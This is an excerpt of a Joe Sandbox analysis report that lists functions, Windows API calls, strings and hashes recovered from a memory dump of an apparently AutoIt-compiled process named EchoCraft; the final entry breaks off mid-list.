Instruction ID: 005a9b8477454e9c7c248a0a60576d8bca53e90f380a9fe87709e6c2b055c0cc
Opcode Fuzzy Hash: 0fae437b712d14d6f1e1e8f04ef1580d866655dae8d77d2c2f93f78182ddb6c9
Instruction Fuzzy Hash: 65616A30204342AFD720EF19C594F69BBE5AF44318F15889CE4A68BBE2D771ED45CB92

Function 00AEC4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AEC56F
IsMenu.USER32(00000000), ref: 00AEC58F
CreatePopupMenu.USER32 ref: 00AEC5C5
GetMenuItemCount.USER32(00CC5400), ref: 00AEC616
InsertMenuItemW.USER32(00CC5400,?,00000001,00000030), ref: 00AEC63E

Strings

2, xrefs: 00AEC5A9
0, xrefs: 00AEC51A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: a195400be4b97beba8bb3228a46485ba9bf966fb494b39dc3ae656486fd91931
Instruction ID: 0447143ba523d9c440953a0351fcafdfe71ae243855975bc082c2a8bf3e95b11
Opcode Fuzzy Hash: a195400be4b97beba8bb3228a46485ba9bf966fb494b39dc3ae656486fd91931
Instruction Fuzzy Hash: CA51D370600385AFDF10DF6AC984BAEBBF5BF55324F249119E811E72D1D7709942CB61

Function 00AECFCA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00AED069

Strings

question, xrefs: 00AED022
warning, xrefs: 00AED052
blank, xrefs: 00AECFEB
info, xrefs: 00AED00A
stop, xrefs: 00AED03A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 621b4b836c394a1a514e609e63d20efde1e1ed2f0fe7e5eb88049e709dddb85b
Instruction ID: 29145d1b3497155eb60417fbefe76298936f4856636375f0d6a561fe2b5035d6
Opcode Fuzzy Hash: 621b4b836c394a1a514e609e63d20efde1e1ed2f0fe7e5eb88049e709dddb85b
Instruction Fuzzy Hash: B9112C3628C38ABEE7215B55DC82CAF77ECEF19320F64006AF502A71C1DBF69E018165

Function 00AEE5F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00AEE60B
gethostname.WSOCK32(?,00000100), ref: 00AEE625
gethostbyname.WSOCK32(?), ref: 00AEE632
inet_ntoa.WSOCK32(?), ref: 00AEE674
_strcat.LIBCMT ref: 00AEE682
WSACleanup.WSOCK32 ref: 00AEE6A7

Strings

0.0.0.0, xrefs: 00AEE650

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 93ab2cc10aa1a7c4f0908364d5a49427c6fd77a2f23d77fb1e50995bb94d07b8
Instruction ID: 38ddaafb97a39ad67a8231b8ef086b798bd473fa2db3b2c94414b292a855fee6
Opcode Fuzzy Hash: 93ab2cc10aa1a7c4f0908364d5a49427c6fd77a2f23d77fb1e50995bb94d07b8
Instruction Fuzzy Hash: C6110D72904214AFCB20BB61DC0AEEE37BCEF96310F0000A9F155A70D1EFB48A819A60

Function 00AEF4F0 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00AEF501
_wcslen.LIBCMT ref: 00AEF512
_wcslen.LIBCMT ref: 00AEF550
_wcslen.LIBCMT ref: 00AEF586
_wcslen.LIBCMT ref: 00AEF5B6
_wcslen.LIBCMT ref: 00AEF5C6
_wcslen.LIBCMT ref: 00AEF602
_wcslen.LIBCMT ref: 00AEF631

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: f78db2c8585cb4ff24a7fd7ad723fd7c46b16f8081617584b6b56dadc3559873
Instruction ID: b75f7ac58a34471384d9642a3310afff1280d88555f8e01f774164523c6c6aaf
Opcode Fuzzy Hash: f78db2c8585cb4ff24a7fd7ad723fd7c46b16f8081617584b6b56dadc3559873
Instruction Fuzzy Hash: 97416D65C102546ACB11EBF58C4ADDEB7ACEF0A300F508862F519E31A1FB34D355C7A6

Function 00A9FBD2 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AC35E0,00000004,00000000,00000000), ref: 00A9FC4D
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AC35E0,00000004,00000000,00000000), ref: 00ADFA40
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AC35E0,00000004,00000000,00000000), ref: 00ADFAC3

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 543bf5d6852e42b3dda434cfd2b08425405d1c99b8fb36c5a5624f8b04e02da9
Instruction ID: 1a7963303e27eedd3b284a1a365716638f580847d641dd0c2db4bfe9538e0bb1
Opcode Fuzzy Hash: 543bf5d6852e42b3dda434cfd2b08425405d1c99b8fb36c5a5624f8b04e02da9
Instruction Fuzzy Hash: E841C8317082859EDF758B38CDC876A7BE1AB46350F54C53DE84B87AA0C671A880C750

Function 00B133DD Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B133F5
GetDC.USER32(00000000), ref: 00B133FD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B13408
ReleaseDC.USER32(00000000,00000000), ref: 00B13414
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B13450
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B13461
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B16141,?,?,000000FF,00000000,?,000000FF,?), ref: 00B1349C
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B134BB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ab60d8cd08070386ce5969f5a03b52cab85c829f2e9d75e0757c1cca94b2d758
Instruction ID: de3db80640593c896dd45cccdf84dfc9411300fabcd59dbe6d020863cb817e50
Opcode Fuzzy Hash: ab60d8cd08070386ce5969f5a03b52cab85c829f2e9d75e0757c1cca94b2d758
Instruction Fuzzy Hash: BC316D72201224BBEB114F509C8AFEB3FA9EF49711F448055FE089B291DA759D91C764

Function 00B05777 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00B057D0
NULL Pointer assignment, xrefs: 00B057F7, 00B05B4C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: a59a63688ea58152f75833eddb5001398d91e1b8897292ef63b9914944490039
Instruction ID: b48efdcae74625387990a54c24a322c09f58b31eab284f2223ef025b2265b08c
Opcode Fuzzy Hash: a59a63688ea58152f75833eddb5001398d91e1b8897292ef63b9914944490039
Instruction Fuzzy Hash: 2AD1A271A0060A9FDF20CF58C881AAEBBF5FF48354F1481A9E915AB691E770ED45CF60

Function 00AC1942 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AC1C1B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AC19EE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AC1C1B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AC1A71
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AC1C1B,?,00AC1C1B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AC1B04
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AC1C1B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AC1B1B

Part of subcall function 00AB3C40: RtlAllocateHeap.NTDLL(00000000,?,?,?,00AA0215,?,?,00AF1070,0000FFFF), ref: 00AB3C72

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AC1C1B,00000000,00000000,?,00000000,?,?,?,?), ref: 00AC1B97
__freea.LIBCMT ref: 00AC1BC2
__freea.LIBCMT ref: 00AC1BCE

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: ad386c1f8c0b20f67bbff8ee37c7d3f354f2c36fc5f8b48250f5235223690d6a
Instruction ID: 0728412463a8371789f51622bc4738358d8d6fefb396ba15560c514d2903ec4c
Opcode Fuzzy Hash: ad386c1f8c0b20f67bbff8ee37c7d3f354f2c36fc5f8b48250f5235223690d6a
Instruction Fuzzy Hash: 2C91D372F002169ADF249FA5C891FEEBBB5AF0A350F16455DE815EB242EB34DC41CB60

Function 00B04CF6 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B04E1B
VariantInit.OLEAUT32(?), ref: 00B04F1C
VariantClear.OLEAUT32(?), ref: 00B04F26
VariantClear.OLEAUT32(?), ref: 00B04F83

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00B04EFF
Null Object assignment in FOR..IN loop, xrefs: 00B04DAB, 00B04ED9, 00B04F91

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 6e8a9dc8a80340e1d16369127f3a0968a4a59bfcb5c6c80d3524c885c5010f16
Instruction ID: 9a61bdad7630ff7d0c88be20c00ca63164dc2971af97c0fbe7cdac17780e295e
Opcode Fuzzy Hash: 6e8a9dc8a80340e1d16369127f3a0968a4a59bfcb5c6c80d3524c885c5010f16
Instruction Fuzzy Hash: 8B9192B1A00219ABDF24DFA5D884FAEBBF8FF45714F108199F615AB290D7709944CBA0

Function 00AF1A18 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00AF1AED
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AF1B15
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00AF1B39
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AF1B69
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AF1BF0
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AF1C55
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00AF1CC1

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 2c9fe544ded080f6561cb1832867447f49f5db943f85535f2a73ec445e89587b
Instruction ID: effaf700c18030bcb8f4403a92dcacc76f9fb713d15df463c43908852cb53582
Opcode Fuzzy Hash: 2c9fe544ded080f6561cb1832867447f49f5db943f85535f2a73ec445e89587b
Instruction Fuzzy Hash: A791BC75A00219EFDB019FE8C885BFEB7B5EF05315F104129F641EB291EB75A942CB90

Function 00A81CD3 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 203b4c247c711f5972febac4a62a4ff5c8c23cc2e52858a7d0815c972a4ca738
Instruction ID: efb3a72be3a6e146c8c4d41b86ebbb4593be9864e4abac553d12b6936c7eceb0
Opcode Fuzzy Hash: 203b4c247c711f5972febac4a62a4ff5c8c23cc2e52858a7d0815c972a4ca738
Instruction Fuzzy Hash: C4913871D00219AFCB10DFA8CC84EEEBBB9FF48320F148559E915B7251D774AA52CBA0

Function 00B0411A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B0413E
CharUpperBuffW.USER32(?,?), ref: 00B0424D
_wcslen.LIBCMT ref: 00B0425D
VariantClear.OLEAUT32(?), ref: 00B043F2

Part of subcall function 00AF1570: VariantInit.OLEAUT32(00000000), ref: 00AF15B0
Part of subcall function 00AF1570: VariantCopy.OLEAUT32(?,?), ref: 00AF15B9
Part of subcall function 00AF1570: VariantClear.OLEAUT32(?), ref: 00AF15C5

Strings

AUTOIT.ERROR, xrefs: 00B04253, 00B04258
Incorrect Parameter format, xrefs: 00B04179, 00B04374

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: ef0f969eb429266dd3aff98b2315058a50d06c77b85e1a7d74d970de2ded7daa
Instruction ID: 57f307ace847c0d6ad58657a4d20ffd76292575d91dded93beb679065b55a64f
Opcode Fuzzy Hash: ef0f969eb429266dd3aff98b2315058a50d06c77b85e1a7d74d970de2ded7daa
Instruction Fuzzy Hash: EE9169B5A083019FC704EF24C58096ABBE5FF88714F1489ADF99A97391DB31ED05CB92

Function 00B05381 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00AE082D: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?,?,00AE0B7D), ref: 00AE084A
Part of subcall function 00AE082D: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?), ref: 00AE0865
Part of subcall function 00AE082D: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?,?), ref: 00AE0873
Part of subcall function 00AE082D: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AE0760,80070057,?), ref: 00AE0883

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B05425
_wcslen.LIBCMT ref: 00B0552D
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B055A3
CoTaskMemFree.OLE32(?), ref: 00B055AE

Strings

NULL Pointer assignment, xrefs: 00B055F7, 00B05626

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 1d47f80e80338c35cc549e926b010ec179d10947075da942e877781191a46717
Instruction ID: bcb41254bf006b605fdfdbfb52d698e60c9f46a926df0a3c3e4858df9bad8900
Opcode Fuzzy Hash: 1d47f80e80338c35cc549e926b010ec179d10947075da942e877781191a46717
Instruction Fuzzy Hash: 5A91F771D002199FDF20DFA4DD81AEEBBB9BF08300F5445A9E915A7291EB719E44CF60

Function 00B127D7 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B1285D
GetMenuItemCount.USER32(00000000), ref: 00B1288F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B128B7
_wcslen.LIBCMT ref: 00B128ED
GetMenuItemID.USER32(?,?), ref: 00B12927
GetSubMenu.USER32(?,?), ref: 00B12935

Part of subcall function 00AE4251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE426B
Part of subcall function 00AE4251: GetCurrentThreadId.KERNEL32 ref: 00AE4272
Part of subcall function 00AE4251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AE2DB3), ref: 00AE4279

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B129BD

Part of subcall function 00AEF152: Sleep.KERNEL32 ref: 00AEF1CA

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 1c79975faa30b023aac624b4fe2c1aad6cf6b53625e8bd7e8ce1682e4773fa87
Instruction ID: 1651454d483caadf0411ab927924d10bb04fc2fc9aab4027c5202c2ea31317f8
Opcode Fuzzy Hash: 1c79975faa30b023aac624b4fe2c1aad6cf6b53625e8bd7e8ce1682e4773fa87
Instruction Fuzzy Hash: 36716F35A00215AFCB04EF68C985AEEB7F5EF48350F5484A9E856EB351DB34E981CB90

Function 00B184A6 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B1853F
IsWindowEnabled.USER32(00000000), ref: 00B1854B
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B18626
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00B18659
IsDlgButtonChecked.USER32(?,00000000), ref: 00B18691
GetWindowLongW.USER32(00000000,000000EC), ref: 00B186B3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B186CB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3dd39514ac07aba4ef5b1b58ac1003871e2f9d52b36e2b81ac149a005cb85c9e
Instruction ID: 404ed6b9ffdea3e00d373ec721ee9f842ad0fa4a4fd49e33323ae9d3e28eefa0
Opcode Fuzzy Hash: 3dd39514ac07aba4ef5b1b58ac1003871e2f9d52b36e2b81ac149a005cb85c9e
Instruction Fuzzy Hash: 5D716B74A04204AFEB219F54C8D4FEA7BFAFF2A310F9440D9E945972A1CB31AD80DB54

Function 00AEB6DE Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00AEB71D
GetKeyboardState.USER32(?), ref: 00AEB732
SetKeyboardState.USER32(?), ref: 00AEB793
PostMessageW.USER32(?,00000101,00000010,?), ref: 00AEB7C1
PostMessageW.USER32(?,00000101,00000011,?), ref: 00AEB7E0
PostMessageW.USER32(?,00000101,00000012,?), ref: 00AEB821
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AEB844

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
